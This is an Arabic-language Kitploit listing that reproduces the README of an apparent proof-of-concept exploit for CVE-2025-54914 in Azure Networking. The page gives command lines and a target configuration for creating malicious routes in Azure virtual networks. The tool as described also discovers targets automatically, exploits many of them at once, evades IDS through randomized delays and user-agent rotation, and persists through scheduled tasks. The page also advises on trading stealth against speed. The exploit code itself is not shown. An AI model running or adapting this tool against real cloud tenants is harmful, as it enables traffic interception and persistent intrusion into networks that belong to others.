Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-54914-PoC — استغلال لـ CVE-2025-54914 في Azure Networking، ينشئ مسارات ضارة مع مراوغة واستمرارية ومسح متعدد الأهداف وإعداد تقارير لاختبار الأمان المصرح به. | Kitploit
أدوات/GitHubGitHub/ash1996x/cve-2025-54914-poc
الاستطلاعآليات الاستمراريةتحليل الثغرات الأمنيةالاستغلالالتهرب من IDS/IPSاختبار الاختراقأمن السحابة
GitHubash1996x/cve-2025-54914-poc

CVE-2025-54914-PoC

استغلال لـ CVE-2025-54914 في Azure Networking، ينشئ مسارات ضارة مع مراوغة واستمرارية ومسح متعدد الأهداف وإعداد تقارير لاختبار الأمان المصرح به.

عرض المستودع
4431منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال مسار Azure CVE-2025-54914

نظرة عامة

هذا تنفيذ محسّن لاستغلال مسار شبكة Azure الخاص بـ CVE-2025-54914. يحافظ هذا الإصدار على وظيفة CVE الأساسية مع إضافة ميزات جديدة تشمل الثبات، التخفي، الفحص متعدد الأهداف، ومعالجة الأخطاء.

الميزات

وظيفة CVE الأساسية

  • إنشاء المسار: إنشاء مسارات ضارة في الشبكات الافتراضية لـ Azure
  • حذف المسار: إزالة المسارات التي تم إنشاؤها لأغراض التنظيف
  • توافق API: يعمل مع Azure Management API 2025-09-01
  • المصادقة: يدعم مصادقة Azure CLI والمصادقة باستخدام الرمز المميز يدويًا

الميزات

  • تقنيات التخفي: تأخيرات عشوائية، تدوير وكيل المستخدم، إخفاء الطلبات
  • الثبات: إنشاء مهام مجدولة، وضع مراقبة مستمر
  • الفحص متعدد الأهداف: فحص واستغلال متزامن لأهداف متعددة
  • تقارير شاملة: تقارير مفصلة مع تحليل النجاح/الفشل
  • معالجة الأخطاء: معالجة أنيقة للفشل والاسترداد
  • إدارة التكوين: تكوين الأهداف بتنسيق JSON
  • اكتشاف الأهداف: اكتشاف تلقائي للموارد الضعيفة
  • تقييم المخاطر: تحليل الثغرات وتقييم المخاطر

التثبيت

المتطلبات الأساسية

# Install Python dependencies
pip install requests

# Install Azure CLI (for authentication)
curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash

الإعداد

# Make scripts executable
chmod +x exploit.py
chmod +x exploit_utils.py

# Authenticate with Azure
az login

الاستخدام

الاستخدام الأساسي

استغلال هدف واحد

# Create route on single target
python exploit.py \
    --subscription-id "12345678-1234-1234-1234-123456789012" \
    --resource-group "production-rg" \
    --vnet-name "prod-vnet" \
    --subnet-name "prod-subnet" \
    --address-prefix "10.0.1.0/24" \
    --next-hop-ip "10.0.2.5"

# Delete route
python exploit.py \
    --subscription-id "12345678-1234-1234-1234-123456789012" \
    --resource-group "production-rg" \
    --vnet-name "prod-vnet" \
    --subnet-name "prod-subnet" \
    --route-name "exploit-route-1" \
    --operation delete

استغلال متعدد الأهداف

# Create configuration file
python exploit_utils.py discover --output targets.json

# Exploit all targets
python exploit.py --targets-file targets.json --operation create

وضع الفحص

# Scan targets without exploitation
python exploit.py --targets-file targets.json --scan-only

وضع الثبات

# Enable persistence with 30-minute intervals
python exploit.py --targets-file targets.json --persistence-mode --interval 30

الاستخدام المتقدم

التخفي والسرية

# Custom delay ranges for evasion
python exploit.py \
    --targets-file targets.json \
    --delay-min 1.0 \
    --delay-max 5.0 \
    --max-workers 5

وضع التشغيل التجريبي

# Test without actual exploitation
python exploit.py --targets-file targets.json --dry-run

التسجيل التفصيلي

# Enable debug logging
python exploit.py \
    --targets-file targets.json \
    --log-level DEBUG \
    --log-file exploit.log

التكوين

تنسيق تكوين الهدف

{
  "targets": [
    {
      "subscription_id": "12345678-1234-1234-1234-123456789012",
      "resource_group": "production-rg",
      "vnet_name": "prod-vnet",
      "subnet_name": "prod-subnet",
      "route_name": "exploit-route-1",
      "address_prefix": "10.0.1.0/24",
      "next_hop_type": "VirtualAppliance",
      "next_hop_ip": "10.0.2.5",
      "api_version": "2025-09-01",
      "priority": 1
    }
  ],
  "metadata": {
    "description": "Target configuration for CVE-2025-54914",
    "created": "2025-01-09",
    "version": "1.0"
  }
}

متغيرات البيئة

# Azure access token (alternative to Azure CLI)
export AZURE_ACCESS_TOKEN="your_token_here"

# Log level
export LOG_LEVEL="INFO"

نصوص مساعدة

اكتشاف الأهداف

# Discover all accessible targets
python exploit_utils.py discover --output discovered_targets.json

# Discover specific subscriptions
python exploit_utils.py discover \
    --subscription-ids "sub1" "sub2" \
    --output targets.json \
    --report discovery_report.txt

إنشاء التكوين

# Generate exploit configuration from discovered targets
python exploit_utils.py config \
    --input discovered_targets.json \
    --output exploit_config.json \
    --address-prefix "10.0.1.0/24" \
    --next-hop-ip "10.0.2.5"

تحليل الثغرات

# Analyze targets for risk assessment
python exploit_utils.py analyze \
    --input targets.json \
    --output vulnerability_report.txt

ميزات الأمان

تقنيات التخفي

  • توقيت الطلبات: تأخيرات عشوائية بين الطلبات
  • تدوير وكيل المستخدم: وكلاء مستخدم متعددون للمتصفح
  • إخفاء الرؤوس: رؤوس HTTP واقعية
  • التحقق من SSL: التحقق السليم من الشهادات

آليات الثبات

  • المهام المجدولة: إنشاء مهام مجدولة في Windows
  • الوضع المستمر: ثبات طويل الأمد
  • إدارة الجلسة: الحفاظ على الحالة عبر عمليات التشغيل
  • ثبات التكوين: حفظ الإعدادات على القرص

معالجة الأخطاء

  • التدهور الآمن: الاستمرار في حالة فشل الأفراد
  • حماية المهلة: منع تعليق الطلبات
  • معالجة الإشارات: إيقاف تشغيل نظيف عند المقاطعة
  • تنظيف الموارد: تنظيف تلقائي عند الخروج

التقارير

تقارير الاستغلال

  • نتائج العملية: نجاح/فشل لكل هدف
  • معلومات التوقيت: طوابع زمنية للتنفيذ
  • تفاصيل الأخطاء: رسائل خطأ مفصلة
  • إحصائيات ملخصة: معدلات النجاح الإجمالية

تقارير الاكتشاف

  • جرد الأهداف: قائمة كاملة بالموارد المكتشفة
  • تفصيل الاشتراكات: الأهداف مجمعة حسب الاشتراك
  • تفاصيل الموارد: معلومات VNet والشبكة الفرعية والموقع

تحليل الثغرات

  • تقييم المخاطر: تصنيف مخاطر عالي/متوسط/منخفض
  • مؤشرات الإنتاج: تحديد بيئات الإنتاج
  • تحليل العلامات: تسجيل المخاطر بناءً على علامات الموارد

أفضل الممارسات

الأمان التشغيلي

  1. استخدم التشغيل التجريبي: اختبر دائمًا باستخدام --dry-run أولاً
  2. حدد النطاق: ابدأ ببيئات غير إنتاجية
  3. راقب السجلات: راجع السجلات للسلوك غير المتوقع
  4. نظف بعد الانتهاء: أزل المسارات التي تم إنشاؤها بعد الاختبار

تحسين الأداء

  1. حدود العمال: اضبط --max-workers بناءً على سعة النظام
  2. ضبط التأخير: وازن بين التخفي والسرعة باستخدام إعدادات التأخير
  3. المعالجة المجمعة: استخدم ملفات الأهداف للعمليات واسعة النطاق
  4. مراقبة الموارد: راقب موارد النظام أثناء التنفيذ

استرداد الأخطاء

  1. افحص السجلات: راجع رسائل الخطأ لاستكشاف الأخطاء وإصلاحها
  2. تحقق من الأذونات: تأكد من وجود أذونات Azure الصحيحة
  3. اتصال الشبكة: تحقق من الاتصال بالإنترنت
  4. صلاحية الرمز: تحقق من حالة مصادقة Azure CLI

استكشاف الأخطاء وإصلاحها

المشكلات الشائعة

أخطاء المصادقة

# Re-authenticate with Azure
az login

# Check current account
az account show

# List accessible subscriptions
az account list

أخطاء الأذونات

# Check required permissions
az role assignment list --assignee $(az account show --query user.name -o tsv)

أخطاء الشبكة

# Test connectivity
curl -I https://management.azure.com

# Check proxy settings
echo $HTTP_PROXY
echo $HTTPS_PROXY

وضع التصحيح

# Enable detailed logging
python exploit.py --log-level DEBUG --log-file debug.log

# Check log file
tail -f debug.log

الاعتبارات القانونية والأخلاقية

⚠️ هام: هذه الأداة مخصصة لاختبار الأمان المصرح به فقط.

  • مطلوب إذن: استخدم الأداة فقط على الأنظمة التي تملكها أو لديك إذن صريح لاختبارها
  • الامتثال القانوني: تأكد من الامتثال للقوانين واللوائح المحلية
  • الإفصاح المسؤول: أبلغ عن الثغرات عبر القنوات المناسبة
  • الاستخدام التعليمي: هذه الأداة مخصصة للأغراض التعليمية والبحثية فقط

الترخيص

هذا المشروع مرخص للاستخدام البحثي والتعليمي فقط. الاستخدام التجاري يتطلب إذنًا صريحًا.

المساهمة

  1. قم بعمل Fork للمستودع
  2. أنشئ فرع ميزة (feature branch)
  3. قم بإجراء تغييراتك
  4. أضف اختبارات إذا كان ذلك مناسبًا
  5. أرسل طلب سحب (pull request)

الدعم

للاستفسارات والمشكلات:

  1. راجع قسم استكشاف الأخطاء وإصلاحها
  2. راجع السجلات للحصول على تفاصيل الأخطاء
  3. أنشئ مشكلة (issue) بمعلومات مفصلة
  4. أرفق التكوين ورسائل الخطأ ذات الصلة
تنزيل الأداة